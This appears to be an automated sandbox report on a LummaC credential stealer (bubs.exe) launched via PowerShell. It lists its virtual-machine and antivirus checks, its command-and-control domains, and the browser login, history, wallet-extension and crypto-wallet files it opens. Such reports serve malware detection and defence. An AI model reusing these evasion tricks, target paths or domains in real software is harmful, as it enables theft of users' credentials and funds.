Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5360			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4440			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe TID: 5160	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414247624.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRB(
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414247624.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: bubs.exe, 00000003.00000003.2337687905.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: powershell.exe, 00000001.00000002.2472760590.000001E431C8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: p3ar11fter.sbs
Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: 3xp3cts1aim.sbs
Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: peepburry828.sbs
Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: p10tgrace.sbs
Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: processhol.sbs
Source: bubs.exe, 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String found in binary or memory: appr0dress.cyou

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Roaming\Extra\bubs.exe "C:\Users\user\AppData\Roaming\Extra\bubs.exe"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: bubs.exe, 00000003.00000002.2415661139.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2393884794.0000000003F4F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2384693903.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414247624.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000002.2416492871.0000000003F4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bubs.exe PID: 4140, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: bubs.exe, 00000003.00000003.2384743615.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: bubs.exe, 00000003.00000003.2374335290.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: bubs.exe, 00000003.00000003.2384743615.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000001.00000002.2476076407.00007FFD34A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
